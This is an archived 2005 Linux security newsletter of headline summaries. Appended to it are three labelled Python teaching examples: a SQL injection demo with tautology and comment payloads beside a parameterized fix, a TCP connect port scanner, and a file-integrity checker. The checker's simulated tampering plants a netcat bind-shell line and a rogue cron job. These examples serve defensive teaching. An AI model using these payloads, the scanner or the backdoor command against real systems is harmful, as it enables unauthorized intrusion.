+---------------------------------------------------------------------+
|  LinuxSecurity.com                         Weekly Newsletter        |
|  August 29th, 2005                         Volume 6, Number 36n     |
|                                                                     |
|  Editorial Team:  Dave Wreski              dave@private             |
|                   Benjamin D. Thomas       ben@private              |
+---------------------------------------------------------------------+

Thank you for reading the LinuxSecurity.com weekly security newsletter.
The purpose of this document is to provide our readers with a quick
summary of each week's most relevant Linux security headlines.

This week, perhaps the most interesting articles include "Storm brewing
over SHA-1 as further breaks are found," "Linux Kernel Denial of Service
and IPsec Policy Bypass," and "Information Security in Campus and Open
Environments."

---

## Master of Science in Information Security ##

Earn your Master of Science in Information Security online from Norwich
University. Designated a "Center of Excellence", the program offers a
solid education in the management of information assurance, and the
unique case study method melds theory into practice. Using today's
e-Learning technology, you can earn this esteemed degree without
disrupting your career or home life.

LEARN MORE:
http://www.msia.norwich.edu/linux_en

---

LINUX ADVISORY WATCH

This week, advisories were released for bluez-utils, thunderbird, mysql,
epiphany, system-config-netboot, kdbg, doxygen, kdeedu, ncpfs, gaim,
system-config-bind, tar, vnc, metacity, cups, pygtk, slocate, myodbc,
xpdf, libgal2, dhcpv, diskdumputils, kdebase, cvs, hwdata, eject, pcre,
kismet, wikiwiki, apache, tor, netpbm, vim, and elm. The distributors
include Debian, Fedora, Gentoo, and Red Hat.

http://www.linuxsecurity.com/content/view/120226/150/

---

Hacks From Pax: PHP Web Application Security
By: Pax Dickinson

Today on Hacks From Pax we'll be discussing PHP web application security.
PHP is a great language for rapidly developing web applications, and is
very friendly to beginning programmers, but some of its design can make
it difficult to write web apps that are properly secure. We'll discuss
some of the main security "gotchas" when developing PHP web
applications, from proper user input sanitization to avoiding SQL
injection vulnerabilities.

http://www.linuxsecurity.com/content/view/120043/49/

---

Network Server Monitoring With Nmap

Portscanning, for the uninitiated, involves sending connection requests
to a remote host to determine which ports are open for connections and,
possibly, which services they are exporting. Portscanning is usually the
first step an attacker takes when attempting to penetrate your system,
so you should be preemptively scanning your own servers and networks to
discover what is exposed before someone unfriendly gets there first.

http://www.linuxsecurity.com/content/view/119864/150/

---

>> The Perfect Productivity Tools <<

WebMail, Groupware and LDAP Integration provide organizations with the
ability to securely access corporate email from any computer,
collaborate with co-workers and set up comprehensive address books to
consistently keep employees organized and connected.

http://ads.linuxsecurity.com/cgi-bin/newad_redirect.pl?id=gdn05

--> Take advantage of the LinuxSecurity.com Quick Reference Card!
--> http://www.linuxsecurity.com/docs/QuickRefCard.pdf

+---------------------+
| Security News:      | <<-----[ Articles This Week ]----------
+---------------------+

* Storm brewing over SHA-1 as further breaks are found
  24th, August, 2005

  Three Chinese researchers have further refined an attack on the hash
  standard frequently used when digitally signing documents, making the
  attack 64 times faster and leaving cryptographers to debate whether
  the standard, known as the Secure Hash Algorithm, should be phased out
  more quickly than planned.
  http://www.linuxsecurity.com/content/view/120200

* Storage and data encryption
  25th, August, 2005

  Data security is a major concern for all CIOs. It has been addressed
  from access and identity controls, through encrypting data in
  transmission, to securing data at rest, on disk or on tape.

  http://www.linuxsecurity.com/content/view/120211

* Host Integrity Monitoring Using Osiris and Samhain
  22nd, August, 2005

  Host integrity monitoring is the process by which system and network
  administrators validate and enforce the security of their systems. It
  can be a complex suite of approaches, tools, and methodologies, or as
  simple as looking at log output. In the past, tools like Tripwire were
  used to check the configurations on hosts. The free version of that
  tool was limited in its manageability; most of that was available only
  in the commercial version.

  http://www.linuxsecurity.com/content/view/120181

* Why You Need To Add "Protect Domain Name" To The Security Checklist
  25th, August, 2005

  Domain name hijacking broadly refers to acts where a registered domain
  name is misused or stolen from the rightful name holder. A domain
  hijacking is a security risk many organizations overlook when they
  develop security policy and business continuity plans. While name
  holders can take measures to protect their domain names against theft
  and loss, many of those measures are not generally known.

  http://www.linuxsecurity.com/content/view/120214

* Linux/Unix e-mail flaw leaves system open to attack
  26th, August, 2005

  Two serious security flaws have turned up in software widely
  distributed with Linux and Unix. The bugs affect Elm (Electronic Mail
  for Unix), a venerable e-mail client still used by many Linux and Unix
  sysadmins, and MPlayer, a cross-platform movie player that is one of
  the most popular of its kind on Linux.
  http://www.linuxsecurity.com/content/view/120230

* Linux Kernel Denial of Service and IPsec Policy Bypass
  25th, August, 2005

  Two vulnerabilities have been reported in the Linux kernel, which can
  be exploited by malicious, local users to cause a DoS (Denial of
  Service) or bypass certain security restrictions.

  http://www.linuxsecurity.com/content/view/120212

* Flexible, safe and secure?
  24th, August, 2005

  This article (http://www.net-security.org/article.php?id=812) looks
  beyond the hype of mobile working to consider some of the practical
  issues of an organisation implementing an ICT strategy that ensures
  data security wherever employees connect to corporate systems.

  http://www.linuxsecurity.com/content/view/120085

* Information Security in Campus and Open Environments
  23rd, August, 2005

  This article is geared towards techies at libraries and schools and
  attempts to address common security problems that may pop up at these
  institutions. The author gears the solutions towards Open Source,
  freeware, and base operating system security in a Windows XP/2k
  environment.

  http://www.linuxsecurity.com/content/view/120186

* Legal disassembly
  23rd, August, 2005

  The question for security researchers going forward is modeled by the
  Lynn saga. Is it legal to disassemble or decompile a vendor's binaries
  to find vulnerabilities? Of course, the answer is mixed. Maybe it is,
  maybe it's not.

  http://www.linuxsecurity.com/content/view/120188

* Be prepared to pay for security
  24th, August, 2005

  When one million of your customers have their IP addresses added to a
  spam blacklist, there is clearly something wrong with your security
  systems. Just ask Telewest: this is exactly what it experienced in May
  after 17,000 of its users saw their computers turn into spam bots.
  http://www.linuxsecurity.com/content/view/120198

* Banks Abandoning SSL On Home Page Log-Ins
  24th, August, 2005

  Some of the biggest banks have abandoned the practice of posting their
  online account log-in screens on SSL-protected pages in an effort to
  boost page response time and guide users to more memorable URLs, a
  U.K. Web performance firm said Tuesday. A log-in form served over plain
  HTTP cannot be verified by the user, and anyone in the path can rewrite
  where the form posts, even if the submission itself is meant to go to
  an HTTPS URL.

  http://www.linuxsecurity.com/content/view/120201

* The Real Problem of Linux: The Userbase?
  25th, August, 2005

  True, a normal Linux installation and setting up basic internet access
  and email settings is proven to be equally easy under Windows as under
  Linux, if not easier under Linux. But I've been using Linux
  distributions for several years now, and I must say that for advanced
  problems it's harder to get things worked out under Linux.

  http://www.linuxsecurity.com/content/view/120210

* Industry Survey Shows SMBs Lack Minimal Security
  25th, August, 2005

  Sean Stenovich often sees his small and midsize business clients pick
  and choose their security solutions based on what they think they need
  and can afford.

  http://www.linuxsecurity.com/content/view/120215

* Sarbanes-Oxley will be 2005's biggest time waster
  23rd, August, 2005

  The Sarbanes-Oxley rules will be the biggest waste of IT resources for
  public companies this year, according to a poll of 444 US companies by
  IBM user group Share.

  http://www.linuxsecurity.com/content/view/120187

* Hacker underground erupts in virtual turf wars
  24th, August, 2005

  In the early days of computer attacks, when bright teens could bring
  down corporate systems, the point was often to trumpet a hacker's
  success. No longer.

  http://www.linuxsecurity.com/content/view/120199

------------------------------------------------------------------------
Distributed by: Guardian Digital, Inc.                LinuxSecurity.com

     To unsubscribe email newsletter-request@private
         with "unsubscribe" in the subject of the message.
------------------------------------------------------------------------

_________________________________________
Attend ToorCon
Sept 16-18th, 2005
Convention Center
San Diego, California
www.toorcon.org
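---

Worked example for the Hacks From Pax PHP article summarized above: the
SQL injection gotcha it mentions, shown as a string-built query beside
its parameterized replacement, with an allow-list check on the username
layered on top. This is an added example, not code from the article or
from Pax Dickinson. It uses Python's sqlite3 module in place of PHP's
database calls, because the behaviour being shown belongs to the SQL,
not the language; the users table, the accounts and the payloads are
constructed for the demo.

```python
"""Added example (not from the Hacks From Pax article): SQL injection
through a string-built query, beside the parameterized fix and an
allow-list check on the input. sqlite3 stands in for PHP's database
calls; the SQL behaviour is the point."""
import re
import sqlite3

# Allow-list for usernames: lowercase letter first, then up to 31 of [a-z0-9_].
USERNAME_RE = re.compile(r"^[a-z][a-z0-9_]{0,31}$")


def make_db():
    """Constructed sample data: an in-memory users table with two accounts.
    Passwords are stored in plain text only to keep the example short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Untrusted input spliced into the query text: the attacker writes SQL."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return sorted(row[0] for row in conn.execute(sql))


def login_safe(conn, username, password):
    """Bound parameters: the driver passes input as data, never as SQL text."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(sql, (username, password)))


def username_is_valid(username):
    """Allow-list validation, used in addition to (not instead of) binding."""
    return USERNAME_RE.match(username) is not None


def demo():
    """Run both login paths against two classic payloads and report results."""
    conn = make_db()
    tautology = "' OR '1'='1"   # turns the WHERE clause into an always-true test
    comment = "alice'--"        # closes the string literal, comments out the rest
    results = {
        "vuln_tautology": login_vulnerable(conn, tautology, tautology),
        "vuln_comment": login_vulnerable(conn, comment, "wrong-password"),
        "safe_tautology": login_safe(conn, tautology, tautology),
        "safe_comment": login_safe(conn, comment, "wrong-password"),
        "safe_valid": login_safe(conn, "alice", "s3cret"),
        "validated": [username_is_valid(u) for u in ("alice", tautology, comment)],
    }
    conn.close()
    return results
```

Against the string-built query the tautology payload returns every user
and the comment payload logs in as alice with a wrong password; against
the parameterized query both return nothing, while a real credential
still works. Binding parameters is the fix; hand-rolled quoting or
escaping is not. The allow-list is defence in depth: it rejects the
payloads before they reach the database and keeps junk out of logs and
error messages.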
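---

Worked example for the Nmap item above: the connect scan it describes,
sending a TCP connection request to each port, treating a completed
handshake as "open" and reading whatever banner the service volunteers.
This is an added example, not code from the article or from Nmap. The
target is a constructed local listener with a made-up SMTP-style banner
so that the example runs offline; the host address, port window and
timeout are choices made for the demo.

```python
"""Added example (not from the article or from Nmap): a TCP connect scan
with banner grabbing, the mechanism behind `nmap -sT`. The target is a
constructed local listener so the example runs offline."""
import socket
import threading

# Constructed service banner; a real mail server would announce itself similarly.
BANNER = b"220 mail.example.test ESMTP ready\r\n"


def start_listener(host="127.0.0.1"):
    """Listen on an OS-assigned port and greet each client with BANNER."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(16)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _peer = srv.accept()
            except OSError:          # listener closed by the caller: stop serving
                return
            try:
                conn.sendall(BANNER)
            finally:
                conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def connect_scan(host, ports, timeout=0.5):
    """Return {port: banner-or-None} for each port whose TCP handshake
    completed. Ports that refused (RST) or timed out are left out."""
    found = {}
    for port in ports:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        try:
            try:
                sock.connect((host, port))   # full three-way handshake
            except OSError:
                continue                     # refused or filtered: not open
            try:
                banner = sock.recv(256).decode("ascii", "replace").strip()
            except OSError:
                banner = ""                  # open, but the service waits for us
            found[port] = banner or None
        finally:
            sock.close()
    return found


def demo():
    """Scan a small window around the constructed listener, as a sweep would."""
    srv, port = start_listener()
    try:
        window = range(max(1, port - 3), port + 4)
        result = connect_scan("127.0.0.1", window)
    finally:
        srv.close()
    return port, result
```

A connect scan completes the three-way handshake, so the service on the
target sees, and may log, every probe; Nmap's default SYN scan (-sS,
which needs raw-socket privilege) never finishes the handshake and is
what most people mean by a stealthy scan. Either way, scan only hosts
you own or are authorized to test.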
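---

Worked example for the Osiris and Samhain item above: the core of host
integrity monitoring, a baseline of content hashes and file metadata
compared against a later scan of the same tree. This is an added
example, not code from Osiris, Samhain, Tripwire or the article. It
builds a throwaway directory with constructed files standing in for a
binary, a shadow file and an access-control file, then simulates the
kinds of change these tools exist to catch; the file names and contents
are made up for the demo.

```python
"""Added example (not from Osiris, Samhain or the article): a minimal
host-integrity baseline and comparison over a constructed directory tree."""
import hashlib
import os
import shutil
import stat
import tempfile

CHUNK = 65536


def file_record(path):
    """Digest plus metadata for one path. Mode, owner and size are kept
    alongside the hash so a permission change (for example a newly set
    setuid bit) is reported even when the content is unchanged. mtime is
    deliberately not recorded: it is trivially forged."""
    st = os.lstat(path)
    rec = {"mode": stat.S_IMODE(st.st_mode), "uid": st.st_uid, "size": st.st_size}
    if stat.S_ISREG(st.st_mode):
        digest = hashlib.sha256()
        with open(path, "rb") as fh:
            for chunk in iter(lambda: fh.read(CHUNK), b""):
                digest.update(chunk)
        rec["sha256"] = digest.hexdigest()
    elif stat.S_ISLNK(st.st_mode):
        rec["target"] = os.readlink(path)
    return rec


def build_baseline(root):
    """Walk root and record every file, keyed by its path relative to root."""
    baseline = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            baseline[os.path.relpath(full, root)] = file_record(full)
    return baseline


def compare(baseline, current):
    """Report added, removed and modified paths between two snapshots."""
    report = {"added": [], "removed": [], "modified": []}
    for rel in sorted(set(baseline) | set(current)):
        if rel not in baseline:
            report["added"].append(rel)
        elif rel not in current:
            report["removed"].append(rel)
        elif baseline[rel] != current[rel]:
            report["modified"].append(rel)
    return report


def demo():
    """Constructed scenario: populate a tree, baseline it, tamper, re-scan."""
    root = tempfile.mkdtemp(prefix="him-")
    try:
        def put(rel, data, mode=0o644):
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(data)
            os.chmod(full, mode)

        put("bin/tool", b"#!/bin/sh\necho hello\n", 0o755)
        put("etc/shadow", b"root:*:0:0:99999:7:::\n", 0o600)
        put("etc/hosts.allow", b"sshd: 10.0.0.0/8\n")
        baseline = build_baseline(root)

        # Simulated tampering: trojaned binary, loosened permissions on a
        # sensitive file, a new cron job, a removed access-control file.
        put("bin/tool", b"#!/bin/sh\nnc -l -p 31337 -e /bin/sh &\necho hello\n", 0o755)
        os.chmod(os.path.join(root, "etc/shadow"), 0o644)
        put("etc/cron.d/update", b"* * * * * root /tmp/.x\n")
        os.remove(os.path.join(root, "etc/hosts.allow"))
        return compare(baseline, build_baseline(root))
    finally:
        shutil.rmtree(root, ignore_errors=True)
```

The shadow file shows up as modified with its content hash unchanged,
which is why mode and owner belong in the record. The baseline is only
as trustworthy as its storage: an attacker with root can rewrite a
baseline kept on the monitored host to match the tampered files, so
keep it (or at least its signature) off-host or on read-only media, as
the Tripwire model requires and as Osiris and Samhain's client/server
designs are meant to provide.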
This archive was generated by hypermail 2.1.3 : Mon Aug 29 2005 - 11:50:43 PDT